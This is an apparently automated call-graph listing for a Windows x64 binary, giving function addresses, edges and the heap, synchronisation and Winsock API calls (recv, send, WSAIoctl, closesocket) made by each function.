7ff6544f9730 WaitOnAddress GetLastError 62956->63089 63090 7ff654404d70 88 API calls 62956->63090 63091 7ff65441c880 52 API calls 62956->63091 62957 7ff654404b01 62959 7ff654405d90 50 API calls 62957->62959 62958->62957 63118 7ff65441c880 52 API calls 62958->63118 62960 7ff654404b0f 62959->62960 62964 7ff654560750 6 API calls 62960->62964 62963 7ff654404583 62971 7ff6544045df 62963->62971 62981 7ff6544045e4 62963->62981 63106 7ff654405de0 51 API calls 62963->63106 62968 7ff654404b17 62964->62968 62965 7ff6544f97e0 50 API calls 62965->62966 62966->62963 62966->62965 62969 7ff65440436e 62966->62969 62975 7ff654404461 62966->62975 62979 7ff6544043cc WakeByAddressSingle 62966->62979 63006 7ff654404422 62966->63006 63102 7ff6544f9730 WaitOnAddress GetLastError 62966->63102 63103 7ff654404e40 50 API calls 62966->63103 62972 7ff6543bc8c0 50 API calls 62968->62972 62973 7ff6543bb190 50 API calls 62969->62973 63110 7ff654404b30 51 API calls 62971->63110 62977 7ff654404b1c 62972->62977 62973->62958 62975->62958 62989 7ff654404513 62975->62989 62993 7ff6544044f5 RtlNtStatusToDosError 62975->62993 62976 7ff6544045ed 62976->62971 62983 7ff6544046f6 62976->62983 62996 7ff65440476f 62976->62996 62978 7ff6543bc8c0 50 API calls 62977->62978 62980 7ff654404b21 62978->62980 62979->62966 62981->62976 62982 7ff6544049db 62981->62982 63107 7ff654405de0 51 API calls 62981->63107 63117 7ff6543b93d0 50 API calls 62982->63117 62983->62971 63108 7ff65441c880 52 API calls 62983->63108 62985 7ff6544047ce 63008 7ff6544047ef 62985->63008 63115 7ff6544f97e0 50 API calls 62985->63115 62986 7ff654404803 WakeByAddressSingle 62987 7ff654404808 62986->62987 62999 7ff654404543 62989->62999 63104 7ff65441c880 52 API calls 62989->63104 62993->62989 62997 7ff65440450e 62993->62997 62994 7ff654404785 62994->62971 63109 7ff65441c880 52 API calls 62994->63109 62996->62994 63114 7ff65441c880 52 API calls 62996->63114 62998 7ff6544f2680 HeapFree 62997->62998 62998->62989 63002 7ff65440454f 62999->63002 62999->63006 63000 7ff6544048d3 63003 7ff6544048e5 WakeByAddressSingle 63000->63003 63004 7ff6544048ed 63000->63004 63005 7ff654404574 63002->63005 63105 7ff654404e40 50 API calls 63002->63105 63003->63004 63004->63008 63116 7ff6544f97e0 50 API calls 63004->63116 63007 7ff6544f2680 HeapFree 63005->63007 63006->63000 63113 7ff6544f97e0 50 API calls 63006->63113 63007->62963 63008->62986 63008->62987 63011 7ff654404567 63011->63005 63013 7ff6544f2680 HeapFree 63011->63013 63013->63005 63015 7ff654404821 63014->63015 63016 7ff654404270 63014->63016 63128 7ff6544f9730 WaitOnAddress GetLastError 63015->63128 63018 7ff654404283 63016->63018 63129 7ff6544f97e0 50 API calls 63016->63129 63019 7ff65440485a 63018->63019 63033 7ff65440429c 63018->63033 63021 7ff6543bb190 50 API calls 63019->63021 63023 7ff654404898 63021->63023 63022 7ff654404b01 63024 7ff654405d90 50 API calls 63022->63024 63023->63022 63135 7ff65441c880 52 API calls 63023->63135 63025 7ff654404b0f 63024->63025 63028 7ff654560750 6 API calls 63025->63028 63031 7ff654404b17 63028->63031 63029 7ff6544f97e0 50 API calls 63029->63033 63037 7ff6543bc8c0 50 API calls 63031->63037 63032 7ff65440436e 63038 7ff6543bb190 50 API calls 63032->63038 63033->63029 63033->63032 63036 7ff654404583 63033->63036 63044 7ff6544043cc WakeByAddressSingle 63033->63044 63049 7ff654404461 63033->63049 63071 7ff654404422 63033->63071 63119 7ff6544f9730 WaitOnAddress GetLastError 63033->63119 63120 7ff654404e40 50 API calls 63033->63120 63035 7ff6544045df 63127 7ff654404b30 51 API calls 63035->63127 63036->63035 63040 7ff6544045e4 63036->63040 63123 7ff654405de0 51 API calls 63036->63123 63042 7ff654404b1c 63037->63042 63038->63023 63041 7ff6544045ed 63040->63041 63047 7ff6544049db 63040->63047 63124 7ff654405de0 51 API calls 63040->63124 63041->63035 63053 7ff65440476f 63041->63053 63054 7ff6544046f6 63041->63054 63043 7ff6543bc8c0 50 API calls 63042->63043 63046 7ff654404b21 63043->63046 63044->63033 63045 7ff6544047ce 63077 7ff6544047ef 63045->63077 63132 7ff6544f97e0 50 API calls 63045->63132 63134 7ff6543b93d0 50 API calls 63047->63134 63049->63023 63055 7ff654404513 63049->63055 63059 7ff6544044f5 RtlNtStatusToDosError 63049->63059 63050 7ff654404803 WakeByAddressSingle 63051 7ff654403b91 63050->63051 63051->62903 63051->62904 63051->62916 63060 7ff654404785 63053->63060 63131 7ff65441c880 52 API calls 63053->63131 63054->63035 63125 7ff65441c880 52 API calls 63054->63125 63064 7ff654404543 63055->63064 63121 7ff65441c880 52 API calls 63055->63121 63059->63055 63062 7ff65440450e 63059->63062 63060->63035 63126 7ff65441c880 52 API calls 63060->63126 63063 7ff6544f2680 HeapFree 63062->63063 63063->63055 63067 7ff65440454f 63064->63067 63064->63071 63065 7ff6544048d3 63068 7ff6544048e5 WakeByAddressSingle 63065->63068 63069 7ff6544048ed 63065->63069 63070 7ff654404574 63067->63070 63122 7ff654404e40 50 API calls 63067->63122 63068->63069 63069->63077 63133 7ff6544f97e0 50 API calls 63069->63133 63072 7ff6544f2680 HeapFree 63070->63072 63071->63065 63130 7ff6544f97e0 50 API calls 63071->63130 63072->63036 63075 7ff654404567 63075->63070 63078 7ff6544f2680 HeapFree 63075->63078 63077->63050 63077->63051 63078->63070 63080 7ff654405d99 63079->63080 63081 7ff654404201 63079->63081 63080->63081 63136 7ff6544f97e0 50 API calls 63080->63136 63081->62924 63101 7ff65441c880 52 API calls 63081->63101 63083->62888 63084->62891 63086->62894 63087->62891 63089->62956 63090->62956 63091->62956 63092->62929 63093->62913 63094->62917 63095->62934 63100->62911 63101->62924 63102->62966 63103->62966 63104->62999 63105->63011 63106->62963 63107->62981 63108->62983 63109->62994 63110->62985 63111->62945 63112->62947 63113->63000 63114->62996 63115->63008 63116->63008 63118->62958 63119->63033 63120->63033 63121->63064 63122->63075 63123->63036 63124->63040 63125->63054 63126->63060 63127->63045 63128->63016 63129->63018 63130->63065 63131->63053 63132->63077 63133->63077 63135->63023 63136->63081 63137 7ff6543c9a40 63138 7ff6543c9a59 63137->63138 63150 7ff6543c9aa1 63137->63150 63139 7ff6543c9aa6 63138->63139 63140 7ff6543c9a6f 63138->63140 63143 7ff6543c9abc 63139->63143 63144 7ff6543c9b48 63139->63144 63139->63150 63141 7ff6543c9afe 63140->63141 63142 7ff6543c9a7c HeapReAlloc 63140->63142 63145 7ff6545160d0 HeapAlloc 63141->63145 63142->63150 63147 7ff6545160d0 HeapAlloc 63143->63147 63146 7ff6545160d0 HeapAlloc 63144->63146 63148 7ff6543c9b09 63145->63148 63146->63150 63147->63150 63149 7ff6543c9b0e memcpy HeapFree 63148->63149 63148->63150 63149->63150 63151 7ff6543a3a86 63152 7ff6543a3ae8 memcpy 63151->63152 63153 7ff6543a3a9d 63151->63153 63155 7ff654396ea0 86 API calls 63152->63155 63154 7ff6543bc4c0 50 API calls 63153->63154 63158 7ff6543a3ab5 63154->63158 63156 7ff6543a3b08 63155->63156 63157 7ff6543a3b1b memcpy 63156->63157 63159 7ff65439b750 16 API calls 63156->63159 63161 7ff6543a3ad5 63157->63161 63158->63152 63158->63161 63159->63157 63162 7ff6543ade99 63163 7ff6543adea0 63162->63163 63164 7ff6543adebf 63163->63164 63166 7ff6543adfe8 63163->63166 63165 7ff6545160d0 HeapAlloc 63164->63165 63167 7ff6543adeda 63165->63167 63168 7ff6543adff1 63166->63168 63169 7ff6543b2d0a 63166->63169 63170 7ff6543b2cd0 63167->63170 63171 7ff6543adee3 63167->63171 63173 7ff6545160d0 HeapAlloc 63168->63173 63449 7ff6543b57e0 50 API calls 63169->63449 63447 7ff6543b5820 50 API calls 63170->63447 63176 7ff6545160d0 HeapAlloc 63171->63176 63174 7ff6543ae002 63173->63174 63177 7ff6543b2cf8 63174->63177 63178 7ff6543ae00b memcpy 63174->63178 63179 7ff6543adf2c 63176->63179 63183 7ff6543b57c0 50 API calls 63177->63183 63185 7ff6543ae049 63178->63185 63181 7ff6543b2ce4 63179->63181 63182 7ff6543adf35 63179->63182 63448 7ff6543b5820 50 API calls 63181->63448 63420 7ff654499be0 HeapFree HeapFree HeapFree HeapFree 63182->63420 63351 7ff6543b2430 63183->63351 63421 7ff65449a630 63 API calls 63185->63421 63188 7ff6543adfc8 63190 7ff6543ae0da memcpy 63188->63190 63189 7ff6543ae0d2 63189->63190 63191 7ff6543b2af1 63189->63191 63192 7ff6543ae0f5 63190->63192 63193 7ff6543bb190 50 API calls 63191->63193 63194 7ff6543ae0fa HeapFree 63192->63194 63218 7ff6543ae10b 63192->63218 63193->63351 63194->63218 63195 7ff6543ae2be memcpy 63196 7ff6543ae2e5 63195->63196 63197 7ff6543ae27d memcpy memcpy 63195->63197 63424 7ff65449a630 63 API calls 63196->63424 63199 7ff6543ae3e1 memcpy 63197->63199 63200 7ff6543ae40e 63197->63200 63425 7ff65449b5e0 76 API calls 63199->63425 63203 7ff6543ae46f memcpy memcpy memcpy 63200->63203 63204 7ff6543ae5e5 63200->63204 63426 7ff65449b6c0 80 API calls 63203->63426 63427 7ff65449b5e0 76 API calls 63204->63427 63206 7ff6543ae409 63217 7ff6543aea98 memcpy memcpy 63206->63217 63208 7ff6543ae39b 63208->63197 63211 7ff6543b2a98 63208->63211 63210 7ff6543ae51b 63214 7ff6545160d0 HeapAlloc 63210->63214 63215 7ff6543bb190 50 API calls 63211->63215 63212 7ff6543ae608 63216 7ff6543aea38 memcpy 63212->63216 63432 7ff65441b5f0 69 API calls 63212->63432 63219 7ff6543ae52e 63214->63219 63215->63351 63216->63206 63221 7ff6543aeae5 63217->63221 63222 7ff6543acf3c 63217->63222 63218->63195 63218->63197 63255 7ff6543ae241 63218->63255 63256 7ff6543b241d 63218->63256 63422 7ff65449ad50 75 API calls 63218->63422 63423 7ff6544c2060 53 API calls 63218->63423 63223 7ff6543b2b74 63219->63223 63224 7ff6543ae537 memcpy 63219->63224 63226 7ff6543aeb00 63221->63226 63227 7ff6543b2987 63221->63227 63230 7ff6543aeb19 memcpy 63222->63230 63265 7ff6543acf65 63222->63265 63446 7ff6543b5820 50 API calls 63223->63446 63229 7ff6543ae5bc 63224->63229 63258 7ff6543ae5d3 63224->63258 63226->63230 63231 7ff6543bc4c0 50 API calls 63227->63231 63232 7ff6543ae61d memcpy memcpy 63229->63232 63229->63258 63235 7ff654396ea0 86 API calls 63230->63235 63231->63351 63428 7ff65449b6c0 80 API calls 63232->63428 63238 7ff6543aeb3c 63235->63238 63236 7ff6543ae6a5 memcpy 63239 7ff6545160d0 HeapAlloc 63236->63239 63237 7ff6543ae8bf 63240 7ff6543ae8d8 63237->63240 63241 7ff6543ae8c7 HeapFree 63237->63241 63242 7ff6543aeb69 63238->63242 63243 7ff6543aeb46 63238->63243 63246 7ff6543ae6ea 63239->63246 63247 7ff6543b5de0 51 API calls 63240->63247 63241->63240 63244 7ff6543aeb76 63242->63244 63433 7ff654397360 65 API calls 63242->63433 63248 7ff65440e180 HeapFree 63243->63248 63253 7ff6543aeb99 63244->63253 63260 7ff65439b750 16 API calls 63244->63260 63249 7ff6543b2966 63246->63249 63250 7ff6543ae6f3 memcpy 63246->63250 63251 7ff6543ae95f 63247->63251 63252 7ff6543aeb56 HeapFree 63248->63252 63442 7ff6543b5820 50 API calls 63249->63442 63250->63258 63287 7ff6543ae729 63250->63287 63264 7ff6545160d0 HeapAlloc 63251->63264 63252->63244 63378 7ff654397d10 63253->63378 63255->63195 63255->63256 63440 7ff6543bf520 50 API calls 63256->63440 63430 7ff654499720 73 API calls 63258->63430 63259 7ff654397820 HeapFree 63259->63265 63260->63253 63261 7ff6543b4302 HeapFree 63261->63265 63262 7ff6543aeca3 63267 7ff6543aeeb4 63262->63267 63268 7ff6543aecb3 HeapFree 63262->63268 63263 7ff6543ae771 memcpy memcpy 63429 7ff65449b6c0 80 API calls 63263->63429 63270 7ff6543ae9d3 63264->63270 63265->63259 63265->63261 63271 7ff6543b3ff2 HeapFree 63265->63271 63272 7ff6543b4013 HeapFree 63265->63272 63279 7ff654560750 6 API calls 63265->63279 63266 7ff6543aec88 63266->63262 63285 7ff6543aecf0 HeapFree 63266->63285 63276 7ff654514af0 78 API calls 63267->63276 63268->63267 63277 7ff6543b2b60 63270->63277 63278 7ff6543ae9dc 63270->63278 63271->63265 63272->63265 63274 7ff6543aec4d 63274->63266 63307 7ff6543aed03 63274->63307 63275 7ff6543ae803 memcpy 63282 7ff6545160d0 HeapAlloc 63275->63282 63283 7ff6543aef34 63276->63283 63445 7ff6543b5820 50 API calls 63277->63445 63431 7ff65449b5e0 76 API calls 63278->63431 63279->63265 63282->63287 63288 7ff6543aef3e 63283->63288 63289 7ff6543b25ac 63283->63289 63285->63266 63286 7ff6543aee93 63286->63267 63292 7ff6543aee9e HeapFree 63286->63292 63287->63249 63287->63258 63287->63263 63294 7ff6543ae843 memcpy 63287->63294 63290 7ff6543aef45 HeapFree 63288->63290 63291 7ff6543aef56 63288->63291 63441 7ff6543bf520 50 API calls 63289->63441 63290->63291 63295 7ff6543aef74 63291->63295 63296 7ff6543aef62 HeapFree 63291->63296 63292->63267 63294->63258 63294->63287 63298 7ff6543aef95 63295->63298 63299 7ff6543aef83 HeapFree 63295->63299 63296->63295 63297 7ff6543aee47 63297->63286 63305 7ff6543aee80 HeapFree 63297->63305 63300 7ff6543aefa1 HeapFree 63298->63300 63301 7ff6543aefb3 63298->63301 63299->63298 63300->63301 63306 7ff654514af0 78 API calls 63301->63306 63303 7ff6543aee07 memcpy 63304 7ff6543aee31 HeapFree 63303->63304 63303->63307 63304->63307 63305->63297 63308 7ff6543af01e 63306->63308 63307->63286 63307->63297 63307->63303 63435 7ff6543c9bb0 53 API calls 63307->63435 63309 7ff6543af06d memcpy 63308->63309 63310 7ff6543af0c8 63309->63310 63311 7ff6543af09e 63309->63311 63386 7ff654397c50 63310->63386 63312 7ff654396ea0 86 API calls 63311->63312 63313 7ff6543af0af 63312->63313 63313->63310 63315 7ff65439b750 16 API calls 63313->63315 63315->63310 63317 7ff6545160d0 HeapAlloc 63318 7ff6543af20d 63317->63318 63319 7ff6543b2952 63318->63319 63320 7ff6543af216 63318->63320 63321 7ff6543b57c0 50 API calls 63319->63321 63322 7ff65440e180 HeapFree 63320->63322 63321->63351 63323 7ff6543af243 HeapFree 63322->63323 63324 7ff6543af26b 63323->63324 63392 7ff6543b5de0 63324->63392 63327 7ff65440f810 70 API calls 63328 7ff6543af391 63327->63328 63409 7ff6543a16b0 63328->63409 63331 7ff6543b5de0 51 API calls 63332 7ff6543af468 memcpy 63331->63332 63334 7ff6543af4b2 63332->63334 63335 7ff6543af49c HeapFree 63332->63335 63358 7ff6543af4c0 memcpy 63334->63358 63436 7ff6543e4dd0 53 API calls 63334->63436 63335->63334 63338 7ff65449c6a0 63340 7ff6543af6a0 memcpy memcpy 63338->63340 63339 7ff6543af57e 63342 7ff6545160d0 HeapAlloc 63339->63342 63341 7ff6543acf93 63340->63341 63343 7ff6543af70c memcpy 63341->63343 63344 7ff6543af5a0 63342->63344 63345 7ff654396ea0 86 API calls 63343->63345 63346 7ff6543b2b22 63344->63346 63347 7ff6543af5a9 63344->63347 63348 7ff6543af72f 63345->63348 63443 7ff6543b5820 50 API calls 63346->63443 63349 7ff6545160d0 HeapAlloc 63347->63349 63353 7ff6545160d0 HeapAlloc 63348->63353 63352 7ff6543af5f2 63349->63352 63354 7ff6543b2b36 63352->63354 63355 7ff6543af5fb 63352->63355 63359 7ff6543af750 63353->63359 63444 7ff6543b5820 50 API calls 63354->63444 63437 7ff654392730 HeapFree HeapFree HeapFree HeapFree 63355->63437 63358->63338 63360 7ff65439b750 16 API calls 63359->63360 63368 7ff6543af961 63359->63368 63360->63368 63361 7ff6543af96d HeapFree 63361->63368 63363 7ff6543af9e0 memcpy 63363->63368 63364 7ff654396ea0 86 API calls 63364->63368 63365 7ff6543afa45 memcpy memcpy memcpy 63365->63368 63366 7ff654397360 65 API calls 63366->63368 63367 7ff65440f810 70 API calls 63367->63368 63368->63361 63368->63363 63368->63364 63368->63365 63368->63366 63368->63367 63369 7ff6543afbdf HeapFree 63368->63369 63370 7ff6543aff08 memcpy memcpy 63368->63370 63372 7ff6543aff56 memcpy memcpy memcpy memcpy 63368->63372 63373 7ff6545160d0 HeapAlloc 63368->63373 63374 7ff6543b011a memcmp 63368->63374 63375 7ff654514af0 78 API calls 63368->63375 63376 7ff6543b198f HeapFree 63368->63376 63377 7ff65439b750 16 API calls 63368->63377 63438 7ff654397f10 93 API calls 63368->63438 63369->63370 63439 7ff654398a50 86 API calls 63370->63439 63372->63368 63373->63368 63374->63368 63375->63368 63376->63368 63377->63368 63379 7ff654397d24 63378->63379 63380 7ff654397d58 63378->63380 63382 7ff654396ea0 86 API calls 63379->63382 63384 7ff654397d45 63379->63384 63381 7ff654397d5e HeapFree 63380->63381 63380->63384 63381->63384 63383 7ff654397d32 63382->63383 63383->63384 63385 7ff65439b750 16 API calls 63383->63385 63384->63262 63384->63266 63384->63274 63434 7ff6543c9bb0 53 API calls 63384->63434 63385->63384 63387 7ff654397c5e 63386->63387 63388 7ff654396ea0 86 API calls 63387->63388 63390 7ff654397cad 63387->63390 63389 7ff654397c9a 63388->63389 63389->63390 63391 7ff65439b750 16 API calls 63389->63391 63390->63317 63391->63390 63393 7ff6543b5ecd 63392->63393 63397 7ff6543b5e00 63392->63397 63394 7ff6543b95d0 50 API calls 63393->63394 63395 7ff6543b5ef7 63394->63395 63396 7ff6543af2f5 memcpy 63395->63396 63398 7ff6543bb190 50 API calls 63395->63398 63396->63327 63397->63393 63399 7ff6543b5f3b 63397->63399 63401 7ff6545160d0 HeapAlloc 63397->63401 63398->63399 63450 7ff6543b57e0 50 API calls 63399->63450 63402 7ff6543b5ebb 63401->63402 63402->63393 63407 7ff6543b57c0 50 API calls 63402->63407 63407->63393 63451 7ff65440e2a0 63409->63451 63411 7ff6543a1733 63414 7ff6543a18d4 63411->63414 63415 7ff6543a179c 63411->63415 63413 7ff6543a1720 HeapFree 63413->63411 63418 7ff654560750 6 API calls 63414->63418 63472 7ff654499c80 memcpy 63415->63472 63419 7ff6543a18e9 63418->63419 63420->63188 63421->63189 63422->63218 63423->63218 63424->63208 63425->63206 63426->63210 63427->63212 63428->63236 63429->63275 63430->63237 63431->63212 63432->63216 63434->63274 63435->63307 63436->63339 63437->63358 63438->63368 63439->63368 63442->63351 63443->63351 63444->63351 63445->63351 63446->63351 63447->63351 63448->63351 63452 7ff65440e2f0 63451->63452 63453 7ff65440e3be 63452->63453 63454 7ff65440e301 63452->63454 63456 7ff6543a16e4 63453->63456 63564 7ff65440e040 53 API calls 63453->63564 63455 7ff6545160d0 HeapAlloc 63454->63455 63458 7ff65440e31c 63455->63458 63456->63411 63456->63413 63459 7ff65440e474 63458->63459 63460 7ff65440e325 63458->63460 63565 7ff6543b5820 50 API calls 63459->63565 63462 7ff6545160d0 HeapAlloc 63460->63462 63463 7ff65440e360 63462->63463 63463->63456 63566 7ff6543b5820 50 API calls 63463->63566 63465 7ff65440e492 63466 7ff65440e180 HeapFree 63465->63466 63467 7ff65440e4a1 63466->63467 63468 7ff654560750 6 API calls 63467->63468 63469 7ff65440e4a9 63468->63469 63470 7ff6543bc8c0 50 API calls 63469->63470 63471 7ff65440e4ae 63470->63471 63473 7ff654499cc1 63472->63473 63474 7ff654499d26 memcpy 63472->63474 63476 7ff654499d05 63473->63476 63478 7ff654499cea 63473->63478 63477 7ff6543a18bf 63474->63477 63476->63474 63568 7ff65453c4d0 50 API calls 63476->63568 63477->63331 63567 7ff6543bd420 50 API calls 63478->63567 63481 7ff654499d61 63569 7ff65440c760 57 API calls 63481->63569 63482 7ff654499cfe 63484 7ff65449a4b5 63482->63484 63485 7ff65449a4b9 HeapFree 63482->63485 63581 7ff654426bd0 52 API calls 63484->63581 63485->63484 63486 7ff654499d77 63486->63474 63489 7ff654499dfa 63486->63489 63491 7ff654499df5 memcpy 63486->63491 63495 7ff65449a451 63486->63495 63496 7ff654499ddb 63486->63496 63488 7ff654499f34 63488->63474 63492 7ff654499f3d HeapFree 63488->63492 63489->63488 63570 7ff65453c5b0 50 API calls 63489->63570 63490 7ff65449a535 63497 7ff65449a5b2 63490->63497 63498 7ff65449a59c HeapFree 63490->63498 63491->63489 63492->63474 63580 7ff6543b57e0 50 API calls 63495->63580 63502 7ff6545160d0 HeapAlloc 63496->63502 63500 7ff65449a5d5 63497->63500 63503 7ff65449a5bf HeapFree 63497->63503 63498->63497 63504 7ff65449a5e0 HeapFree 63500->63504 63505 7ff65449a5f6 63500->63505 63501 7ff654499e34 63506 7ff654499edc 63501->63506 63571 7ff65440c760 57 API calls 63501->63571 63507 7ff654499dec 63502->63507 63503->63500 63504->63505 63582 7ff65449acc0 7 API calls 63505->63582 63506->63488 63513 7ff654499f53 63506->63513 63507->63491 63508 7ff65449a458 63507->63508 63511 7ff6543b57c0 50 API calls 63508->63511 63511->63482 63514 7ff65449a402 63513->63514 63573 7ff65453c210 53 API calls 63513->63573 63522 7ff6543bb190 50 API calls 63514->63522 63517 7ff654499e56 63519 7ff654499e7e 63517->63519 63521 7ff654499ec6 63517->63521 63519->63506 63572 7ff6543b6200 52 API calls 63519->63572 63520 7ff654499f6b 63520->63514 63524 7ff654499f73 memcpy 63520->63524 63521->63506 63525 7ff654499ecb HeapFree 63521->63525 63522->63482 63528 7ff6545160d0 HeapAlloc 63524->63528 63525->63506 63529 7ff654499fd1 63528->63529 63530 7ff65449a440 63529->63530 63531 7ff654499fda memset 63529->63531 63533 7ff6543b57c0 50 API calls 63530->63533 63532 7ff6543b95d0 50 API calls 63531->63532 63534 7ff65449a0ea 63532->63534 63533->63482 63535 7ff65449a0f3 63534->63535 63536 7ff65449a112 63534->63536 63574 7ff6543eb540 HeapFree 63535->63574 63538 7ff65449a110 63536->63538 63575 7ff6543eb540 HeapFree 63536->63575 63540 7ff65449a211 63538->63540 63541 7ff6543b95d0 50 API calls 63538->63541 63578 7ff654426bd0 52 API calls 63540->63578 63543 7ff65449a1c1 63541->63543 63545 7ff65449a1e9 63543->63545 63546 7ff65449a1ca 63543->63546 63544 7ff65449a286 63553 7ff65449a2d3 HeapFree 63544->63553 63554 7ff65449a2e9 63544->63554 63548 7ff65449a1e7 63545->63548 63577 7ff6543eb540 HeapFree 63545->63577 63576 7ff6543eb540 HeapFree 63546->63576 63548->63540 63551 7ff65449a1fe HeapFree 63548->63551 63549 7ff65449a221 63549->63544 63552 7ff65449a255 63549->63552 63551->63540 63555 7ff6543bb190 50 API calls 63552->63555 63553->63554 63556 7ff65449a2f4 HeapFree 63554->63556 63557 7ff65449a30a memcpy 63554->63557 63555->63482 63556->63557 63558 7ff65449a32f memcpy 63557->63558 63559 7ff65449a361 63557->63559 63558->63477 63579 7ff65449a630 63 API calls 63559->63579 63561 7ff65449a3f1 63561->63474 63562 7ff65449a467 63561->63562 63563 7ff6543bb190 50 API calls 63562->63563 63563->63482 63564->63456 63565->63463 63566->63465 63568->63481 63569->63486 63570->63501 63571->63517 63572->63506 63573->63520 63574->63538 63575->63538 63576->63548 63577->63548 63578->63549 63579->63561 63581->63490 63583 7ff6543a39e9 63584 7ff6543a3a0a 63583->63584 63585 7ff6543a16b0 104 API calls 63584->63585 63586 7ff6543a3a34 63585->63586 63587 7ff65451b8a0 63588 7ff65451b8ef 63587->63588 63590 7ff65451b8b0 63587->63590 63590->63588 63592 7ff65439ab60 63590->63592 63596 7ff65441bb70 HeapFree 63590->63596 63593 7ff65439ab7e 63592->63593 63594 7ff65439ab75 63592->63594 63593->63590 63597 7ff65451cf20 63594->63597 63596->63590 63600 7ff65451cf60 63597->63600 63601 7ff65451cf80 63600->63601 63602 7ff65451cf31 63601->63602 63603 7ff65451cfa0 HeapFree 63601->63603 63604 7ff65451cfb2 63601->63604 63602->63593 63603->63604 63604->63602 63605 7ff65451cfb7 HeapFree 63604->63605 63605->63602 63606 7ff654521dc0 63607 7ff654521ded 63606->63607 63608 7ff65452277b 63607->63608 63609 7ff654521e0c 63607->63609 63610 7ff65452277f 63607->63610 63826 7ff65439d3e0 112 API calls 63608->63826 63609->63608 63612 7ff654521e21 63609->63612 63825 7ff6543b9f70 50 API calls 63610->63825 63614 7ff654521e77 63612->63614 63615 7ff6545227b5 63612->63615 63655 7ff654521e44 63612->63655 63618 7ff654521e99 63614->63618 63619 7ff654521ef4 63614->63619 63617 7ff6543bc4c0 50 API calls 63615->63617 63617->63655 63813 7ff65451e650 51 API calls 63618->63813 63620 7ff6545160d0 HeapAlloc 63619->63620 63622 7ff654521f62 63620->63622 63627 7ff654521f6b memcpy 63622->63627 63628 7ff6545227d2 63622->63628 63623 7ff654521eaa 63631 7ff654521ed0 63623->63631 63815 7ff65451b250 55 API calls 63623->63815 63624 7ff654522a8d 63810 7ff654521af0 63624->63810 63629 7ff654521fa1 63627->63629 63627->63655 63827 7ff6543b5820 50 API calls 63628->63827 63633 7ff6545227e6 63629->63633 63642 7ff654521fbd 63629->63642 63816 7ff654521b30 53 API calls 63631->63816 63828 7ff654521c80 50 API calls 63633->63828 63634 7ff654522b4b 63639 7ff654560750 6 API calls 63634->63639 63638 7ff654522086 closesocket 63733 7ff654522093 63638->63733 63640 7ff654522b6d 63639->63640 63641 7ff6543bc8c0 50 API calls 63640->63641 63707 7ff654522b72 63641->63707 63643 7ff6545220d0 63642->63643 63646 7ff654522017 63642->63646 63821 7ff6544f9730 WaitOnAddress GetLastError 63642->63821 63644 7ff6545220ef 63643->63644 63817 7ff6544f97e0 50 API calls 63643->63817 63649 7ff654522102 63644->63649 63650 7ff654522512 63644->63650 63646->63623 63814 7ff65451c760 50 API calls 63646->63814 63651 7ff654522147 63649->63651 63652 7ff65452211b 63649->63652 63653 7ff6543bb190 50 API calls 63650->63653 63762 7ff654406970 63651->63762 63654 7ff65452218b 63652->63654 63657 7ff654406970 92 API calls 63652->63657 63653->63655 63660 7ff654522813 63654->63660 63666 7ff654522198 63654->63666 63805 7ff654406e40 63655->63805 63658 7ff654522145 63657->63658 63658->63654 63661 7ff654522167 63658->63661 63659 7ff654522cf6 63664 7ff654522d89 63659->63664 63670 7ff6543b86f0 50 API calls 63659->63670 63684 7ff654522d12 63659->63684 63662 7ff6543b8690 50 API calls 63660->63662 63665 7ff654522170 63661->63665 63820 7ff6544f97e0 50 API calls 63661->63820 63662->63655 63663 7ff6545221bc 63667 7ff6545221c6 WakeByAddressSingle 63663->63667 63668 7ff6545221ce WSAIoctl 63663->63668 63672 7ff6543bc4a0 50 API calls 63664->63672 63665->63646 63671 7ff65452217e WakeByAddressSingle 63665->63671 63666->63655 63666->63663 63819 7ff6544f97e0 50 API calls 63666->63819 63667->63668 63674 7ff654522230 63668->63674 63675 7ff6545223d4 WSAGetLastError WSAIoctl 63668->63675 63669 7ff654522c09 recv 63676 7ff654522c3b WSAGetLastError 63669->63676 63677 7ff654522d2e 63669->63677 63670->63664 63671->63646 63679 7ff654522d95 63672->63679 63685 7ff6545160d0 HeapAlloc 63674->63685 63681 7ff65452242a 63675->63681 63682 7ff654522472 WSAGetLastError 63675->63682 63676->63677 63676->63707 63677->63684 63689 7ff6543bf520 50 API calls 63677->63689 63680 7ff6544f2680 HeapFree 63679->63680 63683 7ff654522da0 63680->63683 63681->63674 63686 7ff654522477 WSAIoctl 63681->63686 63682->63686 63687 7ff654560750 6 API calls 63683->63687 63688 7ff6545222bd 63685->63688 63690 7ff6545224c9 63686->63690 63691 7ff654522553 WSAGetLastError 63686->63691 63692 7ff654522da8 63687->63692 63693 7ff6545222c6 63688->63693 63694 7ff65452292c 63688->63694 63689->63659 63690->63674 63695 7ff654522558 WSAIoctl 63690->63695 63691->63695 63697 7ff6543bc8c0 50 API calls 63692->63697 63698 7ff654522355 63693->63698 63823 7ff6544f9730 WaitOnAddress GetLastError 63693->63823 63829 7ff6543b5820 50 API calls 63694->63829 63699 7ff6545225a6 63695->63699 63700 7ff6545225be WSAGetLastError 63695->63700 63738 7ff654522dad 63697->63738 63708 7ff654522374 63698->63708 63818 7ff6544f97e0 50 API calls 63698->63818 63699->63674 63702 7ff6545225bc 63699->63702 63700->63702 63702->63646 63706 7ff6545225dd 63702->63706 63703 7ff65452293d 63711 7ff6543bb190 50 API calls 63703->63711 63705 7ff654406280 90 API calls 63705->63707 63822 7ff65439a960 CloseHandle 63706->63822 63707->63659 63707->63669 63707->63684 63707->63705 63717 7ff65451b3e0 HeapFree 63707->63717 63718 7ff6544f2680 HeapFree 63707->63718 63708->63703 63712 7ff654522382 63708->63712 63710 7ff654522647 63715 7ff654522659 WakeByAddressSingle 63710->63715 63716 7ff654522661 63710->63716 63711->63655 63712->63710 63824 7ff6544f97e0 50 API calls 63712->63824 63713 7ff6545225e2 63713->63646 63715->63716 63716->63655 63792 7ff654406410 63716->63792 63717->63707 63718->63707 63719 7ff654522f32 63720 7ff654522e38 send 63720->63719 63723 7ff654522e58 WSAGetLastError 63720->63723 63723->63738 63724 7ff6545226d3 63724->63646 63726 7ff6545226ff 63724->63726 63725 7ff654404240 57 API calls 63727 7ff6545226b9 63725->63727 63728 7ff6545160d0 HeapAlloc 63726->63728 63727->63724 63729 7ff6545226c1 63727->63729 63730 7ff654522732 63728->63730 63732 7ff654406e40 54 API calls 63729->63732 63730->63733 63830 7ff6543b5820 50 API calls 63730->63830 63731 7ff654522f6f 63736 7ff6543bc4a0 50 API calls 63731->63736 63732->63646 63734 7ff654406280 90 API calls 63734->63738 63737 7ff654522f7d 63736->63737 63739 7ff6544f2680 HeapFree 63737->63739 63738->63719 63738->63720 